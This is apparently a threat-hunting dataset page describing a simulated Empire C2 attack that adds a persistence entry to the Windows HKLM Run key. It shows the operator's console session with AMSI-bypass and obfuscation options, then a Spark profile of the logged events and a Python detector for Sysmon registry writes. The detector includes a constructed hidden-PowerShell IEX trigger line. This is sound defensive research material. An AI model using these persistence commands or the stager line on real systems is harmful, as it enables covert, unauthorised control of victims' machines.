Empire Elevated Registry Run Keys

Metadata

Author: Roberto Rodriguez @Cyb3rWard0g
Creation Date: 2020/07/22
Modification Date: 2020/09/04
Tactics: ['TA0003']
Techniques: ['T1547.001']
Tags: ['Local Registry Modification', 'Registry Run Keys']

Dataset Description

This dataset represents adversaries modifying local Run registry keys (i.e. HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Run) for persistence. It also captures the execution of the persistence mechanism.

Notebooks

Notebooks created by the community leveraging the mordor datasets

Author | Name | Link

Simulation Plan

Environment | Tool Type | Module
Mordor shire | C2 | elevated_registry

Adversary View

(Empire: 712ETU3B) > agents
[*] Active agents:

Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener
----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------
712ETU3B ps 172.18.39.5     WORKSTATION5      *MORDOR\pgustavo        powershell         9076   5/0.0    2020-07-22 04:06:31  http            

(Empire: agents) > 
(Empire: agents) > interact 712ETU3B
(Empire: 712ETU3B) > 
(Empire: 712ETU3B) > usemodule persistence/elevated/registry*

(Empire: 712ETU3B) > usemodule persistence/elevated/registry*
(Empire: powershell/persistence/elevated/registry) > info

              Name: Invoke-Registry
            Module: powershell/persistence/elevated/registry
        NeedsAdmin: True
        OpsecSafe: False
          Language: powershell
MinLanguageVersion: 2
        Background: False
  OutputExtension: None

Authors:
  @mattifestation
  @harmj0y

Description:
  Persist a stager (or script) via the
  HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry
  key. This has an easy detection/removal rating.

Comments:
  https://github.com/mattifestation/PowerSploit/blob/master/Pe
  rsistence/Persistence.psm1

Options:

  Name             Required    Value                     Description
  ----             --------    -------                   -----------
  Agent            True        712ETU3B                  Agent to run module on.                 
  Listener         False                                 Listener to use.                        
  Obfuscate        False       False                     Switch. Obfuscate the launcher          
                                                        powershell code, uses the               
                                                        ObfuscateCommand for obfuscation types. 
                                                        For powershell only.                    
  ObfuscateCommand False       Token\All\1               The Invoke-Obfuscation command to use.  
                                                        Only used if Obfuscate switch is True.  
                                                        For powershell only.                    
  AMSIBypass       False       True                      Include mattifestation's AMSI Bypass in 
                                                        the stager code.                        
  AMSIBypass2      False       False                     Include Tal Liberman's AMSI Bypass in   
                                                        the stager code.                        
  KeyName          True        Updater                   Key name for the run trigger.           
  RegPath          False       HKLM:SOFTWARE\Microsoft\  Registry location to store the script   
                              Windows\CurrentVersion\D  code. Last element is the key name.     
                              ebug                    
  ADSPath          False                                 Alternate-data-stream location to store 
                                                        the script code.                        
  ExtFile          False                                 Use an external file for the payload    
                                                        instead of a stager.                    
  Cleanup          False                                 Switch. Cleanup the trigger and any     
                                                        script from specified location.         
  UserAgent        False       default                   User-agent string to use for the staging
                                                        request (default, none, or other).      
  Proxy            False       default                   Proxy to use for request (default, none,
                                                        or other).                              
  ProxyCreds       False       default                   Proxy credentials                       
                                                        ([domain\]username:password) to use for 
                                                        request (default, none, or other).      

(Empire: powershell/persistence/elevated/registry) > set Listener http
(Empire: powershell/persistence/elevated/registry) > execute
[>] Module is not opsec safe, run? [y/N] y
[*] Tasked 712ETU3B to run TASK_CMD_WAIT
[*] Agent 712ETU3B tasked with task ID 7
[*] Tasked agent 712ETU3B to run module powershell/persistence/elevated/registry
(Empire: powershell/persistence/elevated/registry) > 
Registry persistence established using listener http stored in HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Debug.

(Empire: powershell/persistence/elevated/registry) >

Explore Mordor Dataset

Initialize Analytics Engine

from openhunt.mordorutils import *
spark = get_spark()

Download & Process Mordor File

mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/persistence/host/empire_persistence_registry_modification_run_keys_elevated_user.zip"
registerMordorSQLTable(spark, mordor_file, "mordorTable")
[+] Processing a Spark DataFrame..
[+] DataFrame Returned !
[+] Temporary SparkSQL View: mordorTable 

Get to know your data

df = spark.sql(
'''
SELECT Hostname,Channel,EventID, Count(*) as count
FROM mordorTable
GROUP BY Hostname,Channel,EventID
ORDER BY count DESC
'''
)
df.show(truncate=False)
+-------------------------+----------------------------------------+-------+-----+
|Hostname                 |Channel                                 |EventID|count|
+-------------------------+----------------------------------------+-------+-----+
|MORDORDC.mordor.local    |Security                                |5156   |176  |
|WORKSTATION5.mordor.local|Windows PowerShell                      |800    |73   |
|WORKSTATION5.mordor.local|Security                                |4658   |64   |
|WORKSTATION5.mordor.local|Microsoft-Windows-PowerShell/Operational|4103   |62   |
|WORKSTATION5.mordor.local|Security                                |4690   |32   |
|WORKSTATION5.mordor.local|Security                                |4656   |32   |
|MORDORDC.mordor.local    |Microsoft-Windows-Sysmon/Operational    |3      |30   |
|WORKSTATION5.mordor.local|Security                                |5156   |21   |
|MORDORDC.mordor.local    |Security                                |5158   |18   |
|WORKSTATION5.mordor.local|Microsoft-Windows-Sysmon/Operational    |10     |17   |
|WORKSTATION5.mordor.local|Security                                |5158   |14   |
|WORKSTATION5.mordor.local|Microsoft-Windows-Sysmon/Operational    |12     |13   |
|WORKSTATION6.mordor.local|Microsoft-Windows-Sysmon/Operational    |10     |13   |
|WORKSTATION5.mordor.local|Microsoft-Windows-Sysmon/Operational    |3      |13   |
|MORDORDC.mordor.local    |Microsoft-Windows-Sysmon/Operational    |7      |10   |
|WORKSTATION5.mordor.local|Microsoft-Windows-Sysmon/Operational    |13     |6    |
|MORDORDC.mordor.local    |Security                                |4658   |5    |
|MORDORDC.mordor.local    |Security                                |4634   |5    |
|MORDORDC.mordor.local    |Security                                |5145   |4    |
|MORDORDC.mordor.local    |Microsoft-Windows-Sysmon/Operational    |18     |4    |
+-------------------------+----------------------------------------+-------+-----+
only showing top 20 rows
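The dataset's Sysmon Event ID 13 (SetValue) records are the ones that capture the Run key write, so a detection pass over them is the natural next query. The example below is added here and is not part of the original notebook: it runs the same logic in plain Python over constructed rows shaped like mordorTable records (TargetObject, Details, Image are Sysmon's field names; the "Updater" command line and the host SID are constructed illustrations, not the module's real output), flagging Run/RunOnce value writes and separating them from the script-storage write under CurrentVersion\Debug.

```python
import re

# Run/RunOnce value paths as Sysmon renders them (HKLM or HKU hive), T1547.001.
RUN_KEY_RE = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\[^\\]+$", re.IGNORECASE)
# Tokens suggesting the Run value launches script code rather than a plain program path;
# the module above keeps its script under ...\CurrentVersion\Debug and has the trigger load it.
STAGER_HINTS = ("powershell", "get-itemproperty", "iex", "invoke-expression", "frombase64string", "-enc")

def flag_run_key_events(events):
    """One finding per Sysmon Event ID 13 (SetValue) that writes a Run/RunOnce value:
    the writing process, the value name, and whether the stored command looks like a
    script stager. Writes to other keys (e.g. the Debug storage key) are not triggers."""
    findings = []
    for e in events:
        if e.get("Channel") != "Microsoft-Windows-Sysmon/Operational" or e.get("EventID") != 13:
            continue
        target = e.get("TargetObject", "")
        if not RUN_KEY_RE.search(target):
            continue
        details = e.get("Details", "")
        findings.append({
            "Hostname": e.get("Hostname"),
            "Image": e.get("Image"),
            "ValueName": target.rsplit("\\", 1)[-1],
            "Details": details,
            "ScriptStager": any(h in details.lower() for h in STAGER_HINTS),
        })
    return findings

SYSMON = "Microsoft-Windows-Sysmon/Operational"
PS_EXE = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
# Constructed sample rows (not taken from the dataset), shaped like mordorTable records.
# The Updater command line is a constructed trigger that re-reads script code from the Debug key.
SAMPLE_EVENTS = [
    {"Hostname": "WORKSTATION5.mordor.local", "Channel": SYSMON, "EventID": 13, "EventType": "SetValue",
     "Image": PS_EXE, "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater",
     "Details": "powershell -W Hidden -C \"IEX (Get-ItemProperty HKLM:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Debug).Updater\""},
    {"Hostname": "WORKSTATION5.mordor.local", "Channel": SYSMON, "EventID": 13, "EventType": "SetValue",
     "Image": PS_EXE, "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Debug\\Updater",
     "Details": "<script body>"},
    {"Hostname": "WORKSTATION6.mordor.local", "Channel": SYSMON, "EventID": 13, "EventType": "SetValue",
     "Image": "C:\\Program Files\\Vendor\\setup.exe",
     "TargetObject": "HKU\\S-1-5-21-1111111111-2222222222-3333333333-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\VendorTray",
     "Details": "\"C:\\Program Files\\Vendor\\tray.exe\" /silent"},
]

if __name__ == "__main__":
    for f in flag_run_key_events(SAMPLE_EVENTS):
        print(f"{f['Hostname']}: {f['Image']} set Run\\{f['ValueName']} stager={f['ScriptStager']}")
```

In the notebook the same filter is a WHERE clause on Channel, EventID and TargetObject over mordorTable; the ScriptStager flag is what separates the Updater write from an installer adding a plain tray application.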